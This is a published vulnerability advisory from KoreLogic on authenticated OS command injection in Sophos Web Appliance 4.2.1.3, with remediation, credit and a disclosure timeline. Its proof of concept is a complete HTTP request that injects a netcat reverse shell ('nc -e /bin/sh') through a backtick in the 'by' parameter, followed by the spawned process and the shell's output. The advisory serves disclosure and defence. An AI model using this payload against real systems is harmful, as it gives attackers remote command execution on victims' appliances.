Sophos Web Appliance 4.2.1.3 Remote Code Execution

`KL-001-2016-009 : Sophos Web Appliance Remote Code Execution  
  
Title: Sophos Web Appliance Remote Code Execution  
Advisory ID: KL-001-2016-009  
Publication Date: 2016.11.03  
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2016-009.txt  
  
  
1. Vulnerability Details  
  
Affected Vendor: Sophos  
Affected Product: Web Apppliance  
Affected Version: v4.2.1.3  
Platform: Embedded Linux  
CWE Classification: CWE-78: Improper Neutralization of Special Elements  
used in an OS Command ('OS Command Injection'),  
CWE-88: Argument Injection or Modification  
Impact: Remote Code Execution  
Attack vector: HTTP  
  
2. Vulnerability Description  
  
An authenticated user of any privilege can execute arbitrary  
system commands as the non-root webserver user.  
  
3. Technical Description  
  
Multiple parameters to the web interface are unsafely handled and  
can be used to run operating system commands, such as:  
  
POST /index.php?c=logs HTTP/1.1  
Host: [redacted]  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:46.0)  
Gecko/20100101 Firefox/46.0  
Accept: text/javascript, text/html, application/xml, text/xml, */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
DNT: 1  
X-Requested-With: XMLHttpRequest  
X-Prototype-Version: 1.6.1  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Content-Length: 305  
Connection: close  
  
  
STYLE=590fca17b230e8cdba0394cfa28ef2eb&period=today&xperiod=&sb_xperiod=xdays&startDate=&txt_time_start=12%3A00%20AM&endDate=&txt_time_end=11%3A59%20PM&txt_filter_user_timeline=test&action=search&by=user_timeline`nc%20-e%20/bin/sh%20[redacted]%209191`&search=test&sort=time&multiplier=1&start=&end=&direction=1  
  
HTTP/1.1 200 OK  
Date: Tue, 10 May 2016 15:35:05 GMT  
Server: Apache  
Cache-Control: no-store, no-cache, must-revalidate, private, post-check=0,  
pre-check=0  
Pragma: no-cache  
X-Frame-Options: sameorigin  
X-Content-Type-Options: nosniff  
Connection: close  
Content-Type: text/html; charset=utf-8  
Content-Length: 207  
  
{"lastPage":1,"startTime":"2016\/05\/10 12:00 AM","endTime":"2016\/05\/10  
4:35  
PM","filter":"test","recordsDisplayed":0,"recordsTotal":0,"data":[],"startDateBeforeData":false,"earliestRecord":"1970\/01\/01"}  
  
--  
  
The vulnerable parameters are: by, request_id, and txt_filter_domain  
  
That request launches the following process on the SWA:  
  
1000 16851 0.0 0.0 2728 1040 ? S 15:43 0:00 sh -c  
/opt/perl/bin/salp-generate-report.pl --report=Filter --res=-  
--type=user_timeline`nc -e /bin/sh [redacted] 9191` --filter='dGVzdA=='  
--start='2016/05/10' --end='2016/05/10' --action=''  
--sid=590fca17b230e8cdba0394cfa28ef2eb  
  
From the shell launched via netcat:  
  
id;uname -a;uptime  
uid=1000(spiderman) gid=1000(spiderman)  
groups=1000(spiderman),16(cron),44(tproxyd),45(wdx)  
Linux please 3.2.57 #1 SMP Fri Feb 19 18:30:36 UTC 2016 i686 GNU/Linux  
15:52:34 up 4:26, 0 users, load average: 0.11, 0.12, 0.15  
  
4. Mitigation and Remediation Recommendation  
  
The vendor has issued a fix for this vulnerability in Version  
4.3 of SWA. Release notes available at:  
  
http://swa.sophos.com/rn/swa/concepts/ReleaseNotes_4.3.html  
  
5. Credit  
  
This vulnerability was discovered by Matt Bergin (@thatguylevel)  
of KoreLogic, Inc.  
  
6. Disclosure Timeline  
  
2016.09.09 - KoreLogic sends vulnerability report and PoC to Sophos  
2016.09.14 - Sophos requests KoreLogic re-send vulnerability details.  
2016.09.28 - KoreLogic requests status update.  
2016.09.28 - Sophos informs KoreLogic that an update including a fix  
for this vulnerability will be available near the end  
of October.  
2016.10.13 - Sophos informs KoreLogic that the update was released to a  
limited customer base and is expected to be distributed  
at-large over the following week.  
2016.11.03 - Public disclosure.  
  
7. Proof of Concept  
  
See 3. Technical Description.  
  
  
The contents of this advisory are copyright(c) 2016  
KoreLogic, Inc. and are licensed under a Creative Commons  
Attribution Share-Alike 4.0 (United States) License:  
http://creativecommons.org/licenses/by-sa/4.0/  
  
KoreLogic, Inc. is a founder-owned and operated company with a  
proven track record of providing security services to entities  
ranging from Fortune 500 to small and mid-sized companies. We  
are a highly skilled team of senior security consultants doing  
by-hand security assessments for the most important networks in  
the U.S. and around the world. We are also developers of various  
tools and resources aimed at helping the security community.  
https://www.korelogic.com/about-korelogic.html  
  
Our public vulnerability disclosure policy is available at:  
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt  
  
`